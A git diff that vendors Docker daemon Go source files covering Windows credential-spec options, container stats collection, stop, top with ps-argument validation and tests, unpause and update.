+			splitsOpt = strings.SplitN(sOpt, "=", 2)
+			if len(splitsOpt) != 2 {
+				return nil, fmt.Errorf("invalid security option: %s", sOpt)
+			}
+			if splitsOpt[0] != "credentialspec" {
+				return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0])
+			}
+
+			credentialsOpts := &libcontainerd.CredentialsOption{}
+			var (
+				match   bool
+				csValue string
+				err     error
+			)
+			if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match {
+				if csValue == "" {
+					return nil, fmt.Errorf("no value supplied for file:// credential spec security option")
+				}
+				if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil {
+					return nil, err
+				}
+			} else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match {
+				if csValue == "" {
+					return nil, fmt.Errorf("no value supplied for registry:// credential spec security option")
+				}
+				if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil {
+					return nil, err
+				}
+			} else {
+				return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value")
+			}
+			createOptions = append(createOptions, credentialsOpts)
+		}
+	}
+
+	// Now add the remaining options.
+	createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore})
+	createOptions = append(createOptions, hvOpts)
+	createOptions = append(createOptions, layerOpts)
+	if epList != nil {
+		createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery})
+	}
+
+	return createOptions, nil
+}
+
+// getCredentialSpec is a helper function to get the value of a credential spec supplied
+// on the CLI, stripping the prefix
+func getCredentialSpec(prefix, value string) (bool, string) {
+	if strings.HasPrefix(value, prefix) {
+		return true, strings.TrimPrefix(value, prefix)
+	}
+	return false, ""
+}
+
+// readCredentialSpecRegistry is a helper function to read a credential spec from
+// the registry. If not found, we return an empty string and warn in the log.
+// This allows for staging on machines which do not have the necessary components.
+func readCredentialSpecRegistry(id, name string) (string, error) {
+	var (
+		k   registry.Key
+		err error
+		val string
+	)
+	if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil {
+		return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation)
+	}
+	if val, _, err = k.GetStringValue(name); err != nil {
+		if err == registry.ErrNotExist {
+			return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id)
+		}
+		return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id)
+	}
+	return val, nil
+}
+
+// readCredentialSpecFile is a helper function to read a credential spec from
+// a file. If not found, we return an empty string and warn in the log.
+// This allows for staging on machines which do not have the necessary components.
+func readCredentialSpecFile(id, root, location string) (string, error) {
+	if filepath.IsAbs(location) {
+		return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute")
+	}
+	base := filepath.Join(root, credentialSpecFileLocation)
+	full := filepath.Join(base, location)
+	if !strings.HasPrefix(full, base) {
+		return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base)
+	}
+	bcontents, err := ioutil.ReadFile(full)
+	if err != nil {
+		return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err)
+	}
+	return string(bcontents[:]), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go
new file mode 100644
index 0000000000..51f5962d17
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats.go
@@ -0,0 +1,158 @@
+package daemon
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"runtime"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/api/types/versions/v1p20"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+// ContainerStats writes information about the container to the stream
+// given in the config object.
+func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error {
+	if runtime.GOOS == "solaris" {
+		return fmt.Errorf("%+v does not support stats", runtime.GOOS)
+	}
+	// Engine API version (used for backwards compatibility)
+	apiVersion := config.Version
+
+	container, err := daemon.GetContainer(prefixOrName)
+	if err != nil {
+		return err
+	}
+
+	// If the container is either not running or restarting and requires no stream, return an empty stats.
+	if (!container.IsRunning() || container.IsRestarting()) && !config.Stream {
+		return json.NewEncoder(config.OutStream).Encode(&types.Stats{})
+	}
+
+	outStream := config.OutStream
+	if config.Stream {
+		wf := ioutils.NewWriteFlusher(outStream)
+		defer wf.Close()
+		wf.Flush()
+		outStream = wf
+	}
+
+	var preCPUStats types.CPUStats
+	var preRead time.Time
+	getStatJSON := func(v interface{}) *types.StatsJSON {
+		ss := v.(types.StatsJSON)
+		ss.Name = container.Name
+		ss.ID = container.ID
+		ss.PreCPUStats = preCPUStats
+		ss.PreRead = preRead
+		preCPUStats = ss.CPUStats
+		preRead = ss.Read
+		return &ss
+	}
+
+	enc := json.NewEncoder(outStream)
+
+	updates := daemon.subscribeToContainerStats(container)
+	defer daemon.unsubscribeToContainerStats(container, updates)
+
+	noStreamFirstFrame := true
+	for {
+		select {
+		case v, ok := <-updates:
+			if !ok {
+				return nil
+			}
+
+			var statsJSON interface{}
+			statsJSONPost120 := getStatJSON(v)
+			if versions.LessThan(apiVersion, "1.21") {
+				if runtime.GOOS == "windows" {
+					return errors.New("API versions pre v1.21 do not support stats on Windows")
+				}
+				var (
+					rxBytes   uint64
+					rxPackets uint64
+					rxErrors  uint64
+					rxDropped uint64
+					txBytes   uint64
+					txPackets uint64
+					txErrors  uint64
+					txDropped uint64
+				)
+				for _, v := range statsJSONPost120.Networks {
+					rxBytes += v.RxBytes
+					rxPackets += v.RxPackets
+					rxErrors += v.RxErrors
+					rxDropped += v.RxDropped
+					txBytes += v.TxBytes
+					txPackets += v.TxPackets
+					txErrors += v.TxErrors
+					txDropped += v.TxDropped
+				}
+				statsJSON = &v1p20.StatsJSON{
+					Stats: statsJSONPost120.Stats,
+					Network: types.NetworkStats{
+						RxBytes:   rxBytes,
+						RxPackets: rxPackets,
+						RxErrors:  rxErrors,
+						RxDropped: rxDropped,
+						TxBytes:   txBytes,
+						TxPackets: txPackets,
+						TxErrors:  txErrors,
+						TxDropped: txDropped,
+					},
+				}
+			} else {
+				statsJSON = statsJSONPost120
+			}
+
+			if !config.Stream && noStreamFirstFrame {
+				// prime the cpu stats so they aren't 0 in the final output
+				noStreamFirstFrame = false
+				continue
+			}
+
+			if err := enc.Encode(statsJSON); err != nil {
+				return err
+			}
+
+			if !config.Stream {
+				return nil
+			}
+		case <-ctx.Done():
+			return nil
+		}
+	}
+}
+
+func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} {
+	return daemon.statsCollector.collect(c)
+}
+
+func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) {
+	daemon.statsCollector.unsubscribe(c, ch)
+}
+
+// GetContainerStats collects all the stats published by a container
+func (daemon *Daemon) GetContainerStats(container *container.Container) (*types.StatsJSON, error) {
+	stats, err := daemon.stats(container)
+	if err != nil {
+		return nil, err
+	}
+
+	// We already have the network stats on Windows directly from HCS.
+	if !container.Config.NetworkDisabled && runtime.GOOS != "windows" {
+		if stats.Networks, err = daemon.getNetworkStats(container); err != nil {
+			return nil, err
+		}
+	}
+
+	return stats, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go
new file mode 100644
index 0000000000..dc6825e705
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_collector.go
@@ -0,0 +1,132 @@
+// +build !solaris
+
+package daemon
+
+import (
+	"bufio"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/pubsub"
+)
+
+type statsSupervisor interface {
+	// GetContainerStats collects all the stats related to a container
+	GetContainerStats(container *container.Container) (*types.StatsJSON, error)
+}
+
+// newStatsCollector returns a new statsCollector that collections
+// stats for a registered container at the specified interval.
+// The collector allows non-running containers to be added
+// and will start processing stats when they are started.
+func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector {
+	s := &statsCollector{
+		interval:   interval,
+		supervisor: daemon,
+		publishers: make(map[*container.Container]*pubsub.Publisher),
+		bufReader:  bufio.NewReaderSize(nil, 128),
+	}
+	platformNewStatsCollector(s)
+	go s.run()
+	return s
+}
+
+// statsCollector manages and provides container resource stats
+type statsCollector struct {
+	m          sync.Mutex
+	supervisor statsSupervisor
+	interval   time.Duration
+	publishers map[*container.Container]*pubsub.Publisher
+	bufReader  *bufio.Reader
+
+	// The following fields are not set on Windows currently.
+	clockTicksPerSecond uint64
+	machineMemory       uint64
+}
+
+// collect registers the container with the collector and adds it to
+// the event loop for collection on the specified interval returning
+// a channel for the subscriber to receive on.
+func (s *statsCollector) collect(c *container.Container) chan interface{} {
+	s.m.Lock()
+	defer s.m.Unlock()
+	publisher, exists := s.publishers[c]
+	if !exists {
+		publisher = pubsub.NewPublisher(100*time.Millisecond, 1024)
+		s.publishers[c] = publisher
+	}
+	return publisher.Subscribe()
+}
+
+// stopCollection closes the channels for all subscribers and removes
+// the container from metrics collection.
+func (s *statsCollector) stopCollection(c *container.Container) {
+	s.m.Lock()
+	if publisher, exists := s.publishers[c]; exists {
+		publisher.Close()
+		delete(s.publishers, c)
+	}
+	s.m.Unlock()
+}
+
+// unsubscribe removes a specific subscriber from receiving updates for a container's stats.
+func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) {
+	s.m.Lock()
+	publisher := s.publishers[c]
+	if publisher != nil {
+		publisher.Evict(ch)
+		if publisher.Len() == 0 {
+			delete(s.publishers, c)
+		}
+	}
+	s.m.Unlock()
+}
+
+func (s *statsCollector) run() {
+	type publishersPair struct {
+		container *container.Container
+		publisher *pubsub.Publisher
+	}
+	// we cannot determine the capacity here.
+	// it will grow enough in first iteration
+	var pairs []publishersPair
+
+	for range time.Tick(s.interval) {
+		// it does not make sense in the first iteration,
+		// but saves allocations in further iterations
+		pairs = pairs[:0]
+
+		s.m.Lock()
+		for container, publisher := range s.publishers {
+			// copy pointers here to release the lock ASAP
+			pairs = append(pairs, publishersPair{container, publisher})
+		}
+		s.m.Unlock()
+		if len(pairs) == 0 {
+			continue
+		}
+
+		systemUsage, err := s.getSystemCPUUsage()
+		if err != nil {
+			logrus.Errorf("collecting system cpu usage: %v", err)
+			continue
+		}
+
+		for _, pair := range pairs {
+			stats, err := s.supervisor.GetContainerStats(pair.container)
+			if err != nil {
+				if _, ok := err.(errNotRunning); !ok {
+					logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err)
+				}
+				continue
+			}
+			// FIXME: move to containerd on Linux (not Windows)
+			stats.CPUStats.SystemUsage = systemUsage
+
+			pair.publisher.Publish(*stats)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
new file mode 100644
index 0000000000..9cf9f0a94e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go
@@ -0,0 +1,34 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"time"
+)
+
+// newStatsCollector returns a new statsCollector for collection stats
+// for a registered container at the specified interval. The collector allows
+// non-running containers to be added and will start processing stats when
+// they are started.
+func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector {
+	return &statsCollector{}
+}
+
+// statsCollector manages and provides container resource stats
+type statsCollector struct {
+}
+
+// collect registers the container with the collector and adds it to
+// the event loop for collection on the specified interval returning
+// a channel for the subscriber to receive on.
+func (s *statsCollector) collect(c *container.Container) chan interface{} {
+	return nil
+}
+
+// stopCollection closes the channels for all subscribers and removes
+// the container from metrics collection.
+func (s *statsCollector) stopCollection(c *container.Container) {
+}
+
+// unsubscribe removes a specific subscriber from receiving updates for a container's stats.
+func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) {
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go
new file mode 100644
index 0000000000..0fcc9c5828
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_collector_unix.go
@@ -0,0 +1,71 @@
+// +build !windows,!solaris
+
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"strconv"
+	"strings"
+
+	sysinfo "github.com/docker/docker/pkg/system"
+	"github.com/opencontainers/runc/libcontainer/system"
+)
+
+// platformNewStatsCollector performs platform specific initialisation of the
+// statsCollector structure.
+func platformNewStatsCollector(s *statsCollector) {
+	s.clockTicksPerSecond = uint64(system.GetClockTicks())
+	meminfo, err := sysinfo.ReadMemInfo()
+	if err == nil && meminfo.MemTotal > 0 {
+		s.machineMemory = uint64(meminfo.MemTotal)
+	}
+}
+
+const nanoSecondsPerSecond = 1e9
+
+// getSystemCPUUsage returns the host system's cpu usage in
+// nanoseconds. An error is returned if the format of the underlying
+// file does not match.
+//
+// Uses /proc/stat defined by POSIX. Looks for the cpu
+// statistics line and then sums up the first seven fields
+// provided. See `man 5 proc` for details on specific field
+// information.
+func (s *statsCollector) getSystemCPUUsage() (uint64, error) {
+	var line string
+	f, err := os.Open("/proc/stat")
+	if err != nil {
+		return 0, err
+	}
+	defer func() {
+		s.bufReader.Reset(nil)
+		f.Close()
+	}()
+	s.bufReader.Reset(f)
+	err = nil
+	for err == nil {
+		line, err = s.bufReader.ReadString('\n')
+		if err != nil {
+			break
+		}
+		parts := strings.Fields(line)
+		switch parts[0] {
+		case "cpu":
+			if len(parts) < 8 {
+				return 0, fmt.Errorf("invalid number of cpu fields")
+			}
+			var totalClockTicks uint64
+			for _, i := range parts[1:8] {
+				v, err := strconv.ParseUint(i, 10, 64)
+				if err != nil {
+					return 0, fmt.Errorf("Unable to convert value %s to int: %s", i, err)
+				}
+				totalClockTicks += v
+			}
+			return (totalClockTicks * nanoSecondsPerSecond) /
+				s.clockTicksPerSecond, nil
+		}
+	}
+	return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file")
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go
new file mode 100644
index 0000000000..41731b9c14
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go
@@ -0,0 +1,15 @@
+// +build windows
+
+package daemon
+
+// platformNewStatsCollector performs platform specific initialisation of the
+// statsCollector structure. This is a no-op on Windows.
+func platformNewStatsCollector(s *statsCollector) {
+}
+
+// getSystemCPUUsage returns the host system's cpu usage in
+// nanoseconds. An error is returned if the format of the underlying
+// file does not match. This is a no-op on Windows.
+func (s *statsCollector) getSystemCPUUsage() (uint64, error) {
+	return 0, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go
new file mode 100644
index 0000000000..d875607b3a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_unix.go
@@ -0,0 +1,58 @@
+// +build !windows
+
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+)
+
+// Resolve Network SandboxID in case the container reuse another container's network stack
+func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error) {
+	curr := c
+	for curr.HostConfig.NetworkMode.IsContainer() {
+		containerID := curr.HostConfig.NetworkMode.ConnectedContainer()
+		connected, err := daemon.GetContainer(containerID)
+		if err != nil {
+			return "", fmt.Errorf("Could not get container for %s", containerID)
+		}
+		curr = connected
+	}
+	return curr.NetworkSettings.SandboxID, nil
+}
+
+func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) {
+	sandboxID, err := daemon.getNetworkSandboxID(c)
+	if err != nil {
+		return nil, err
+	}
+
+	sb, err := daemon.netController.SandboxByID(sandboxID)
+	if err != nil {
+		return nil, err
+	}
+
+	lnstats, err := sb.Statistics()
+	if err != nil {
+		return nil, err
+	}
+
+	stats := make(map[string]types.NetworkStats)
+	// Convert libnetwork nw stats into api stats
+	for ifName, ifStats := range lnstats {
+		stats[ifName] = types.NetworkStats{
+			RxBytes:   ifStats.RxBytes,
+			RxPackets: ifStats.RxPackets,
+			RxErrors:  ifStats.RxErrors,
+			RxDropped: ifStats.RxDropped,
+			TxBytes:   ifStats.TxBytes,
+			TxPackets: ifStats.TxPackets,
+			TxErrors:  ifStats.TxErrors,
+			TxDropped: ifStats.TxDropped,
+		}
+	}
+
+	return stats, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go
new file mode 100644
index 0000000000..f8e6f6f84a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stats_windows.go
@@ -0,0 +1,11 @@
+package daemon
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+)
+
+// Windows network stats are obtained directly through HCS, hence this is a no-op.
+func (daemon *Daemon) getNetworkStats(c *container.Container) (map[string]types.NetworkStats, error) {
+	return make(map[string]types.NetworkStats), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go
new file mode 100644
index 0000000000..aa7b3820c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/stop.go
@@ -0,0 +1,83 @@
+package daemon
+
+import (
+	"fmt"
+	"net/http"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/container"
+)
+
+// ContainerStop looks for the given container and terminates it,
+// waiting the given number of seconds before forcefully killing the
+// container. If a negative number of seconds is given, ContainerStop
+// will wait for a graceful termination. An error is returned if the
+// container is not found, is already stopped, or if there is a
+// problem stopping the container.
+func (daemon *Daemon) ContainerStop(name string, seconds *int) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+	if !container.IsRunning() {
+		err := fmt.Errorf("Container %s is already stopped", name)
+		return errors.NewErrorWithStatusCode(err, http.StatusNotModified)
+	}
+	if seconds == nil {
+		stopTimeout := container.StopTimeout()
+		seconds = &stopTimeout
+	}
+	if err := daemon.containerStop(container, *seconds); err != nil {
+		return fmt.Errorf("Cannot stop container %s: %v", name, err)
+	}
+	return nil
+}
+
+// containerStop halts a container by sending a stop signal, waiting for the given
+// duration in seconds, and then calling SIGKILL and waiting for the
+// process to exit. If a negative duration is given, Stop will wait
+// for the initial signal forever. If the container is not running Stop returns
+// immediately.
+func (daemon *Daemon) containerStop(container *container.Container, seconds int) error {
+	if !container.IsRunning() {
+		return nil
+	}
+
+	daemon.stopHealthchecks(container)
+
+	stopSignal := container.StopSignal()
+	// 1. Send a stop signal
+	if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil {
+		// While normally we might "return err" here we're not going to
+		// because if we can't stop the container by this point then
+		// its probably because its already stopped. Meaning, between
+		// the time of the IsRunning() call above and now it stopped.
+		// Also, since the err return will be environment specific we can't
+		// look for any particular (common) error that would indicate
+		// that the process is already dead vs something else going wrong.
+		// So, instead we'll give it up to 2 more seconds to complete and if
+		// by that time the container is still running, then the error
+		// we got is probably valid and so we force kill it.
+		if _, err := container.WaitStop(2 * time.Second); err != nil {
+			logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal)
+			if err := daemon.killPossiblyDeadProcess(container, 9); err != nil {
+				return err
+			}
+		}
+	}
+
+	// 2. Wait for the process to exit on its own
+	if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil {
+		logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal)
+		// 3. If it doesn't, then send SIGKILL
+		if err := daemon.Kill(container); err != nil {
+			container.WaitStop(-1 * time.Second)
+			logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it
+		}
+	}
+
+	daemon.LogContainerEvent(container, "stop")
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go
new file mode 100644
index 0000000000..7fb81d0148
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/top_unix.go
@@ -0,0 +1,126 @@
+//+build !windows
+
+package daemon
+
+import (
+	"fmt"
+	"os/exec"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+)
+
+func validatePSArgs(psArgs string) error {
+	// NOTE: \\s does not detect unicode whitespaces.
+	// So we use fieldsASCII instead of strings.Fields in parsePSOutput.
+	// See https://github.com/docker/docker/pull/24358
+	re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)")
+	for _, group := range re.FindAllStringSubmatch(psArgs, -1) {
+		if len(group) >= 3 {
+			k := group[1]
+			v := group[2]
+			if k != "pid" {
+				return fmt.Errorf("specifying \"%s=%s\" is not allowed", k, v)
+			}
+		}
+	}
+	return nil
+}
+
+// fieldsASCII is similar to strings.Fields but only allows ASCII whitespaces
+func fieldsASCII(s string) []string {
+	fn := func(r rune) bool {
+		switch r {
+		case '\t', '\n', '\f', '\r', ' ':
+			return true
+		}
+		return false
+	}
+	return strings.FieldsFunc(s, fn)
+}
+
+func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) {
+	procList := &types.ContainerProcessList{}
+
+	lines := strings.Split(string(output), "\n")
+	procList.Titles = fieldsASCII(lines[0])
+
+	pidIndex := -1
+	for i, name := range procList.Titles {
+		if name == "PID" {
+			pidIndex = i
+		}
+	}
+	if pidIndex == -1 {
+		return nil, fmt.Errorf("Couldn't find PID field in ps output")
+	}
+
+	// loop through the output and extract the PID from each line
+	for _, line := range lines[1:] {
+		if len(line) == 0 {
+			continue
+		}
+		fields := fieldsASCII(line)
+		p, err := strconv.Atoi(fields[pidIndex])
+		if err != nil {
+			return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err)
+		}
+
+		for _, pid := range pids {
+			if pid == p {
+				// Make sure number of fields equals number of header titles
+				// merging "overhanging" fields
+				process := fields[:len(procList.Titles)-1]
+				process = append(process, strings.Join(fields[len(procList.Titles)-1:], " "))
+				procList.Processes = append(procList.Processes, process)
+			}
+		}
+	}
+	return procList, nil
+}
+
+// ContainerTop lists the processes running inside of the given
+// container by calling ps with the given args, or with the flags
+// "-ef" if no args are given.  An error is returned if the container
+// is not found, or is not running, or if there are any problems
+// running ps, or parsing the output.
+func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) {
+	if psArgs == "" {
+		psArgs = "-ef"
+	}
+
+	if err := validatePSArgs(psArgs); err != nil {
+		return nil, err
+	}
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	if !container.IsRunning() {
+		return nil, errNotRunning{container.ID}
+	}
+
+	if container.IsRestarting() {
+		return nil, errContainerIsRestarting(container.ID)
+	}
+
+	pids, err := daemon.containerd.GetPidsForContainer(container.ID)
+	if err != nil {
+		return nil, err
+	}
+
+	output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output()
+	if err != nil {
+		return nil, fmt.Errorf("Error running ps: %v", err)
+	}
+	procList, err := parsePSOutput(output, pids)
+	if err != nil {
+		return nil, err
+	}
+	daemon.LogContainerEvent(container, "top")
+	return procList, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go
new file mode 100644
index 0000000000..269ab6e947
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go
@@ -0,0 +1,76 @@
+//+build !windows
+
+package daemon
+
+import (
+	"testing"
+)
+
+func TestContainerTopValidatePSArgs(t *testing.T) {
+	tests := map[string]bool{
+		"ae -o uid=PID":             true,
+		"ae -o \"uid= PID\"":        true,  // ascii space (0x20)
+		"ae -o \"uid= PID\"":        false, // unicode space (U+2003, 0xe2 0x80 0x83)
+		"ae o uid=PID":              true,
+		"aeo uid=PID":               true,
+		"ae -O uid=PID":             true,
+		"ae -o pid=PID2 -o uid=PID": true,
+		"ae -o pid=PID":             false,
+		"ae -o pid=PID -o uid=PIDX": true, // FIXME: we do not need to prohibit this
+		"aeo pid=PID":               false,
+		"ae":                        false,
+		"":                          false,
+	}
+	for psArgs, errExpected := range tests {
+		err := validatePSArgs(psArgs)
+		t.Logf("tested %q, got err=%v", psArgs, err)
+		if errExpected && err == nil {
+			t.Fatalf("expected error, got %v (%q)", err, psArgs)
+		}
+		if !errExpected && err != nil {
+			t.Fatalf("expected nil, got %v (%q)", err, psArgs)
+		}
+	}
+}
+
+func TestContainerTopParsePSOutput(t *testing.T) {
+	tests := []struct {
+		output      []byte
+		pids        []int
+		errExpected bool
+	}{
+		{[]byte(`  PID COMMAND
+   42 foo
+   43 bar
+  100 baz
+`), []int{42, 43}, false},
+		{[]byte(`  UID COMMAND
+   42 foo
+   43 bar
+  100 baz
+`), []int{42, 43}, true},
+		// unicode space (U+2003, 0xe2 0x80 0x83)
+		{[]byte(` PID COMMAND
+   42 foo
+   43 bar
+  100 baz
+`), []int{42, 43}, true},
+		// the first space is U+2003, the second one is ascii.
+		{[]byte(` PID COMMAND
+   42 foo
+   43 bar
+  100 baz
+`), []int{42, 43}, true},
+	}
+
+	for _, f := range tests {
+		_, err := parsePSOutput(f.output, f.pids)
+		t.Logf("tested %q, got err=%v", string(f.output), err)
+		if f.errExpected && err == nil {
+			t.Fatalf("expected error, got %v (%q)", err, string(f.output))
+		}
+		if !f.errExpected && err != nil {
+			t.Fatalf("expected nil, got %v (%q)", err, string(f.output))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go
new file mode 100644
index 0000000000..3dd8ead468
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/top_windows.go
@@ -0,0 +1,53 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/go-units"
+)
+
+// ContainerTop handles `docker top` client requests.
+// Future considerations:
+// -- Windows users are far more familiar with CPU% total.
+//    Further, users on Windows rarely see user/kernel CPU stats split.
+//    The kernel returns everything in terms of 100ns. To obtain
+//    CPU%, we could do something like docker stats does which takes two
+//    samples, subtract the difference and do the maths. Unfortunately this
+//    would slow the stat call down and require two kernel calls. So instead,
+//    we do something similar to linux and display the CPU as combined HH:MM:SS.mmm.
+// -- Perhaps we could add an argument to display "raw" stats
+// -- "Memory" is an extremely overloaded term in Windows. Hence we do what
+//    task manager does and use the private working set as the memory counter.
+//    We could return more info for those who really understand how memory
+//    management works in Windows if we introduced a "raw" stats (above).
+func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) {
+	// It's not at all an equivalent to linux 'ps' on Windows
+	if psArgs != "" {
+		return nil, errors.New("Windows does not support arguments to top")
+	}
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return nil, err
+	}
+
+	s, err := daemon.containerd.Summary(container.ID)
+	if err != nil {
+		return nil, err
+	}
+	procList := &types.ContainerProcessList{}
+	procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"}
+
+	for _, j := range s {
+		d := time.Duration((j.KernelTime100ns + j.UserTime100ns) * 100) // Combined time in nanoseconds
+		procList.Processes = append(procList.Processes, []string{
+			j.ImageName,
+			fmt.Sprint(j.ProcessId),
+			fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000),
+			units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))})
+	}
+	return procList, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go
new file mode 100644
index 0000000000..e66b3868dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/unpause.go
@@ -0,0 +1,38 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/container"
+)
+
+// ContainerUnpause unpauses a container
+func (daemon *Daemon) ContainerUnpause(name string) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if err := daemon.containerUnpause(container); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// containerUnpause resumes the container execution after the container is paused.
+func (daemon *Daemon) containerUnpause(container *container.Container) error {
+	container.Lock()
+	defer container.Unlock()
+
+	// We cannot unpause the container which is not paused
+	if !container.Paused {
+		return fmt.Errorf("Container %s is not paused", container.ID)
+	}
+
+	if err := daemon.containerd.Resume(container.ID); err != nil {
+		return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go
new file mode 100644
index 0000000000..6e26eeb96a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/update.go
@@ -0,0 +1,92 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+// ContainerUpdate updates configuration of the container
+func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) {
+	var warnings []string
+
+	warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true)
+	if err != nil {
+		return container.ContainerUpdateOKBody{Warnings: warnings}, err
+	}
+
+	if err := daemon.update(name, hostConfig); err != nil {
+		return container.ContainerUpdateOKBody{Warnings: warnings}, err
+	}
